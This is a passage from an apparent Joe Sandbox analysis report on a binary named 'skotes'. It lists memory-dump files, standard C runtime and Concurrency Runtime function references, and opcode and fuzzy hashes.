                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 4162181273-393685449
                                                                                                                                                                                                                                                  • Opcode ID: 317d88e5a178b8669ae550446afc8ed579e571dda5d263ba658a78d02d0239eb
                                                                                                                                                                                                                                                  • Instruction ID: 694511cb2108eb0ed303be49fbcef4c0c8eb89fbecd5d7903cba360ca4ccbd16
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 317d88e5a178b8669ae550446afc8ed579e571dda5d263ba658a78d02d0239eb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85C1AA71C00609EFCF14DF95CA80AAEBBB5BF6A315F00415BF8056B206D379DA51CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004A4877
                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 004A487F
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004A4908
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 004A4933
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004A4988
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: S9J$csm
                                                                                                                                                                                                                                                  • API String ID: 1170836740-1039778544
                                                                                                                                                                                                                                                  • Opcode ID: ce49c1d52c79a70b8c1c5acdbb7ff36892567072dd5da818072fee7fe882b470
                                                                                                                                                                                                                                                  • Instruction ID: 3b0f524da6ba678459329984837d35d3ba0fcd4a3a8018729c074f93546eb6e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce49c1d52c79a70b8c1c5acdbb7ff36892567072dd5da818072fee7fe882b470
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4741E774A002089FCF10DF29D844A9F7BB4AFD6318F14815BF8149B352C7BD9A15CB95
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004973B0
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004973F2
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0049740E
                                                                                                                                                                                                                                                  • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00497419
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00497440
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                                  • API String ID: 3897347962-3650809737
                                                                                                                                                                                                                                                  • Opcode ID: 577fab4f1185b90440235c9cd414ce4c70b9857904a656bcf2ace83fb47515eb
                                                                                                                                                                                                                                                  • Instruction ID: 69b35a2d1e1f73c50a21fc17694a5dd0d20bc624d74593f386df714773fa5dbe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 577fab4f1185b90440235c9cd414ce4c70b9857904a656bcf2ace83fb47515eb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B216134A00219EFCF10EF95C595AAE7FB5BF19344F14407AE90197351CB38AD00CB58
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _SpinWait.LIBCONCRT ref: 0048EEBC
                                                                                                                                                                                                                                                  • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0048EEC8
                                                                                                                                                                                                                                                  • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0048EEE1
                                                                                                                                                                                                                                                  • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0048EF0F
                                                                                                                                                                                                                                                  • Concurrency::Context::Block.LIBCONCRT ref: 0048EF31
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                                                                                                                                  • String ID: iH
                                                                                                                                                                                                                                                  • API String ID: 1182035702-997331765
                                                                                                                                                                                                                                                  • Opcode ID: 65ce68668f67484e4e8c84ffff43c325d1bb8410e27bb2fe3f1deecfb5634018
                                                                                                                                                                                                                                                  • Instruction ID: 4b61a252a65dfc1436e9962cd325e4d3dc2848d15d5386563247f5301d4efa2f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65ce68668f67484e4e8c84ffff43c325d1bb8410e27bb2fe3f1deecfb5634018
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF217170C002059ADF24FFA6C4456EEB7F0BF15324F100D2FE261A62D1E7794A45CB59
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00497903
                                                                                                                                                                                                                                                    • Part of subcall function 00495CB8: __EH_prolog3_catch.LIBCMT ref: 00495CBF
                                                                                                                                                                                                                                                    • Part of subcall function 00495CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00495CF8
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0049792A
